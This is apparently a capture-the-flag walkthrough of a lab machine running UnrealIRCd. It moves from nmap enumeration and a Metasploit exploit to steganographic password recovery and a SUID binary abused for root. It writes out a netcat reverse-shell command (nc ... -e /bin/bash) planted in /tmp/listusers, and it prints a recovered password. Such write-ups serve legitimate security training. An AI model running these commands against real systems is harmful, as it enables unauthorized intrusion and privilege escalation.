MACHINE IP :- 10.10.10.117
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn’t have a title (text/html).
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34295/udp status
| 100024 1 37949/tcp status| 100024 1 43765/udp6 status
|_ 100024 1 54977/tcp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
37949/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCdHere when we start enumeration we got to see that there is an image at http port we got a image and nothing else but a hint “IRC is almost working!” and at nmap we got see that there is a service running at port 6697 irc UnrealIRCD when we begin to search for exploit we got a metasploit exploit
So here we get our user shell , now let’s check for post exploitation but before that let’s take a proper shell using python command
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Now let’s search for some config files so that we can get some hints to move for root shell
and here we got our user.txt flag but are unable to read it because other users are not having permission to read it but at .backup we find some sensitive information which can help us in getting djmardov user as we can see that .backup file is having a password which indicates STEG = Steganography it is a technique to hide secret inside a file
Now we are having the password to open the steg file but the main way is to find the file having the secret , after lot of enumeration i came to hint as steg can be hidden in jpg,wav file , i remember a JPG file at port http
And then i search for Steganographic Decoder and found it at decoder here i placed the password we got from .backup and placed downloaded image we got from http 👆
BINGO!!! we got the password “Kab6h+m+bbp2J:HG” now let’s try to connect to ssh using this password for djmardov and yup we got in the ssh using this password
YUP we got the djmardov user and now we can read the user flag
Now coming to root privilege escalation i begin with LinEnum.sh file to enumerate and there i found a suid file which seems to be new to suid
As this is new to suid i was very curious to see what it does so i run it and it came with a error showing /tmp/listusers not found and when i made listusers file manually it runs properly
As we know that this is taking something form listusers file what if we give our nc shell in listusers file ,let’s check it out are we getting any solution or not
echo “nc 10.10.14.2 1234 -e /bin/bash” > /tmp/listusersthen we run viewuser and start nc at our local pc nc -lvp 1234 :- at our local pc and then run the command /use/bin/viewuser :- from target and we got the reverse shell as root
THANKYOU …. 😄 🏁
